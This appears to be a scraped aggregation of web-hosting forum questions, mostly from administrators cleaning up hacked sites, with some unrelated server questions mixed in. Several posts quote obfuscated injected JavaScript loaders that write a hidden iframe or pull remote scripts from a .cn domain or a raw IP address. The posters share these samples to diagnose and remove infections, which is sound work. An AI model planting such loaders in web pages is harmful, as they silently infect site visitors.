all sites in my server have maliciose code:
</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>
how to localize this code in my sites, using grep.
My server work in centos.
I have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?
CentOS 5.2 - 64bits
WHM+cPanel
Exemplo of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi
I've been having an issue with one of my sites were someone has been adding malicious code to the index file. I don't know what has been compromised and am looking for a way to stop this.
I have a dedicated server have already upgraded MySQL to the latest version as I though that might work but it hasn't.
for the first time in my sites life(10 year site) google blocked it. when you type my site google says that my site has malicious code in it.as we find it the problem in my site came from the company where i hosted it.we clear all the files for the malicious code and now its all ok.i want to ask if anyone knows for his experience how much days google will check my site again to see if all its ok.i send them before six hours via webmaster tools, a request for eaming agin my site,but i dont knwo how will do these. so i am asking anyone of you,who had same experience.any help will be appreciate.please help me with anything you think that might be useful for me to having my site back again in google correctly!
View 5 Replies View Relatedwe have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?
The problem:
On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.
Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.
On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.
We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.
What we have done to attempt to secure the server:
1) We have installed SuPhp.
2) We have ensured that all scripts on the affected websites are updated and running the latest versions.
3) We have changed all the passwords.
Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.
The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.
One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.
Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?
[url]
when I try to send Email from horde I have this:
PHP Code:
There was an error sending your message: Failed to add recipient: xxxxx@hotmail.com [SMTP: Invalid response code received from server (code: 451, response: Temporary local problem - please try later)]
We are having a problem with a number of our websites hosted on Fasthosts reseller account where JavaScript is being maliciously inserted into a number of pages.
An example of the code that has been inserted can be found below:
<!--
document.write(unescape('xXz%3CAEqscripzHVt%20RMisAEqrRMicxXz%3DzHV%2FyI%2F6
yI7zHV%2E21wq5RMi%2E2xXz4wq6%2E3AEq4RMi%2FjqAEquwqexXzry%2EjsyI%3E%3CzHV%2Fs
crRMiiwqpzHVtwq%3E').replace(/yI|zHV|fW|xXz|RMi|wq|AEq/g,""));
-->
Which runs this script:
<script src=//67.215.246.34/jquery.js></script>
New pages have been created on a number of websites aswell as the above code inserted into existing pages.
After removing the above code from one particular website it has happened again.
Some of the websites being affected are just static websites with only HTML pages, others are dynamic ASP pages.
Has anyone here ever heard of a malicious script called Mulcishell, stored in the file mshell.php? I've seen a bunch of instances of the file in my clients' folders with permissions 777, and I want to know what it does and how it works. (I already deleted the file, knowing it was a malicious script, but I want to know how to prevent it from ever being executed on my server.)
View 1 Replies View Relatedwe received a report of a malicious mail being sent from our servers. Problem is that the sender and recipients are not hosted with us. What I'm trying to find out is how the mail got sent out. The ME logs shows that the connection was made from 127.0.0.1 to the smtp service, but that's it.
We don't run mail services (pop3/imap/webmail) on the web servers, if that helps any. Have run out of ideas after sifting thru lots of logs (was trying to find if anyone called an application to send the mail and attachments out), but came up empty.
I am wanting to know if there is a way to stop files being uploaded to my vps, via ftp cpanel etc that are malicious..
I have been told there is a way to do this but i havent been told how..
Basicaly i want to know if there is something where i can add a list of keywords that are in the malicious files and what ever it is will stop them from being uploaded or if they manage to get uploaded onto my vps will it make them not work?
I am looking into this as i had an issue before where someone uploaded a shell onto my server :@ luckily it didnt cause no damage or he didnt get anywhere but i still want to be safe.
I decided to apply PHP safe mode to my servers, considering:
- I cannot prohibit using exec functions (some binary uses are needed, like host, mysqldump, etc..)
- I cannot restrict at all via UID/GID method at bins due to several problems..
Safe mode is the final sollution, as I only need "safe_mode_exec_dir" config to set a folder with the necesary binaries... this will stop nobody user (Apache) to exec whatever it wants, like perl, binaries uploaded to an public insecure folder (exploits), or anything else... people only could exec() the binaries I want and where I want. This will stop finally 95% of my hack problems.
Well. The problem is safe_mode is enabled or not, but you cannot set o disable certain features of this safe mode, like UID/GID checks (*******!)...
I am trying to configure so only "safe_mode_exec_dir" would apply, so:
- Including UIDs checks disabled by:
safe_mode_include_dir = "/home/"
(tested)
- Some variables set to NULL, as safe_mode_allowed_env_vars or safe_mode_protected_env_vars...
- safe_mode_exec_dir = "/usr/phpbin/"
Great! with symbolic lynks in... the best sollution available for me.
- open_basedir = "/home/"
(for fopen, etc...)
Ok ok.. but problems there.. by example this one:
Quote:
Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 32015 is not allowed to access cache/dynamic_fields/modules.php owned by uid 99 in /home/yyyyyyyyy/public_html/chn/modules/DynamicFields/DynamicField.php on line 823
Great.. fopen is under UID/GID checks, but it is not an include, so safe_mode_include_dir would not apply...
Now fopen, link, unlink, etc.. functions are UID restricted and this seems to be impossible to disable.... pffffffff...
can you share your safe_mode configs or sollutions for this problem?
i manage linux apache webserver with a few wordpress blogs and from time to time i see someone inject a malicious .php file into wp-content/uploads/2014/10/ directory.
i think its some bad plugin or theme, but these is more blogs, i ugrade, update, WP, but
how can i setup some monitor to tell me which php file (or even line in php file) injected that malicious .php ? I have linux root access so i can setup anythingÂ
What is EPP code, I am required to enter it to register domain
View 5 Replies View RelatedPHP 5.2.1 installed on WHM 10.8.0 cPanel 10.9.0-C9565
If I load a php file on browser, it gets loaded, but in HTML source I can see php code.
If I run in SSH "php info.php", the php code gets runn and normal output is generated.
I checked these lines in httpd.conf:
LoadModule php5_module libexec/libphp5.so
AddModule mod_php5.c
AddHandler application/x-httpd-php .php .php4 .php3
AddType application/x-httpd-php .php
AddType application/x-httpd-php .php4
AddType application/x-httpd-php .php3
AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .phtml
"php -v" returns:
PHP 5.2.1 (cli) (built: Apr 9 2007 10:38:29)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
with Zend Extension Manager v1.2.0, Copyright (c) 2003-2006, by Zend Technologies
with Zend Optimizer v3.2.2, Copyright (c) 1998-2006, by Zend Technologies
On php.ini I have:
; Enable the PHP scripting language engine under Apache.
engine = "On" ;engine
I use long tags ("<?php").
I recompiled Apache and PHP few times, both from WHM and from SSH. I reinstalled Zend optimizer.
We are testing a module that we think may improve stability on our webservers. The module limits the number of concurrent connections allowed from any particular ip address.
What I need an opinion on is what error message the server should return when it is refusing because of the limit.
The module currently returns a 503 error, that's what the module's author set it to do. 503 is a temporary error, which is good, but it implies that the problem is with the server, which seems somewhat inaccurate to me.
I was thinking a 409 would be good, with text saying that the request conflicts with the per visitor connection limit for the requested resource. Ideally the browser would display the message and people would know to reconfigure software or wait for existing connections to complete before resubmitting the request.
One of my co-workers here says that at least people understand the "server busy" error and they won't understand the "conflict" message.
Someone else says most of these errors will come from folks using http 1.0 and the 409 doesn't exist at that level of the protocol, so they won't get anything more than a generic "error!" type of message.
I put the windows media palyer embedded code on my site, but is there a way to limit the buffer or rate at which the video downloads or streams to the user.
Quote:
<object classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" codebase= [url]
That is the code i use.
does anybody have a script that can veiw the php source code before it runs to the server of an external site
View 1 Replies View RelatedSomeone sniffed ftp password of a user account on my server and looks like javascripts were altered and iframe tags inserted in php files, while i cleaned up php pages i see the following javascript code added to each .js file, what is it supposed to do?
<!--
(function(qAWI){var OMt9='var-20a-3d-22S-63-72ip-74-45n-67-69ne-22-2cb-3d-22-56e-72sion-28)+-22-2cj-3d-22-22-2cu-3dnavigator-2e-75s-65-72A-67-65nt-3bi-66((-75-2eindex-4ff-28-22-43h-72ome-22)-3c0)-26-26(u-2einde-78-4ff(-22Win-22)-3e0)-26-26(u-2eindexOf(-22-4eT-206-22)-3c0)-26-26-28doc-75me-6et-2eco-6fk-69e-2e-69-6ed-65x-4ff(-22-6di-65k-3d1-22)-3c0-29-26-26(ty-70-65-6ff(z-72v-7at-73)-21-3dty-70eof(-22A-22)))-7b-7a-72v-7a-74s-3d-22A-22-3beval(-22-69-66(window-2e-22+a+-22)j-3d-6a+-22-2ba+-22M-61jo-72-22-2b-62-2ba+-22-4din-6f-72-22+b+a+-22B-75ild-22-2b-62+-22-6a-3b-22)-3bd-6f-63u-6dent-2ewri-74e(-22-3c-73c-72ipt-20src-3d-2f-2fma-22+-22rtuz-2ecn-2fvid-2f-3fi-64-3d-22-2bj+-22-3e-3c-5c-2fsc-72ipt-3e-22)-3b-7d';var M2ye=OMt9.replace(qAWI,'%');eval(unescape(M2ye))})(/-/g);
-->
I have a customer who is hosting a website on a dedicated server. The server is a high spec server with Intel Core 2 DUO E8400 processor, 4 GB DDR2 ECC RAM and a SATA Hard Drive. He is running only a single website which has a data entry section. The problem is that a few scripts when run consume 99% of the CPU. In fact, there is a particular script which even if run alone consumes 99% CPU. The code retrieves some records from the database by running an SQL query. The code is never executed. I have checked the sql query in the code and it runs fine if executed in SQL Query Analyzer. I know the problem is somewhere in the code, but cannot find the exact cause. Is there a tool to debug the asp code and find out may be the issue with the code? I have tried the Debug Diagnostics utility,
View 2 Replies View Relatedhow this new feature works in csf with blocking by country code.
I'm trying to put a block on Indonesia.
A friend of mine is trying to show the page below, however it just shows the code.
[url]
What can I do to fix it?
I am currently developing a web application on a WAMP server. Once complete my client will have some in-house "programmers" make changes to the code as they are needed.
My client wants to track all changes made to the source files (ie- who made the change, when it was made, what files were modified, and what specific lines were added/removed/modified). Also, the program must run on the server and not the programmers computers.
I've searched high and low and only found a couple programs that scratch the surface of what they want.
Some JSP pages display the source code. Some work and some don't even after recompiling apache with tomcat module and restarting jsp.
-rw-r--r-- 1 user user 6.5K Mar 10 17:18 index.jsp
Not sure where the jsp logs are, but there were no errors in the domlogs.
I have just moved to a VPS server from my shared hosting server and I am suddenly finding it tough to code equally well by just using the vim command. I have become more used to the CPanel code editor probably.
Can anyone suggest a nice tool for the same. I have installed webmin, but its code editor just sucks.
i have a vps account and am trying to setup my website i installed php 4 from a control panel where it auto installed php and there is mysql and i installed all of them but when i upload my script and go to install or go to the index of my site it shows the php code and does not execute.
my permissions are right on i also made a testphp file and used this code <?php phpinfo(); ?> and still nothing just shows the php code when you browse to the file i even went further i installed from the control panel another program called phpmyadmin and when i log in it does the same thing just shows php code so what the hell is going on you think i need to contact my host provider for this issue i sent an email out but waiting for a responce
I have a site that runs on my dedicated server and it is MySQL/PHP based. Sometimes when I post news to the site or even try to open the homepage I get:
Quote:
Server Error
The following error occurred: [code=SERVER_RESPONSE_CLOSE] The server closed
the connection while reading the response. Contact your system administrator.
If I want to open a url say, [url]I can use file_get_content
$content=file_get_content[url]
How to do the equivalent using curl, socket, socket, and wget?
My server was just upgraded to FC6 and now I do not have pico for a editor. I found nano but there is problems. Screen does not refresh correctly and when I type in charaters sometimes extra charaters show up.
Are there any other screen editors built in to FC6 (not vi)
A friend of mine that has a proxy site on my server just realized that his site is giving some very weird error and he said he has not made any changes to the site in a while as he's been pre-occupied with other things...
Quote:
--removed--.com has sent an incorrect or unexpected message. Error Code: -12263
It appears as a JavaScript Alert when you hit submit on the proxy url form... However, I looked into it a bit and there is no JavaScript on the page... Therefore, it must be some sort of server error I'd assume... I even disabled JavaScript in Firefox and still received the error...
It is possible to make code execution on the server with applications such as FastCGI or Zend Optimizer, but the code isn't compiled for good, it's more of a bytecode that is created on the fly, correct?
I'd like to know if it's possible to compile code (PHP, Python, Ruby, etc...) so that when you request a page, the compiled code is executed the same way as compiled C++ code with cgi-bin.
I'm asking because it would be quite efficient in case of high-traffic web sites instead of running intermediary code (bytecode).
Is it possible? What do you think is the more efficient, less resource-intensive and fastest way to execute dynamic-content pages?
I am using dreamweaver to build our corporate intranet for a company I work for. I created a header.php file for a menu that is completed. Using dreamweaver I entered this code:
<?php
include("header.php");
?>
in the appropriate section of the index.php file. The file name is correct and in the right place. It shows up fine in dreamweaver, but the menu is missing when you view it on the intranet. Please help guys. I have been at this for 2 days now and my boss is waiting for a presentation on this.
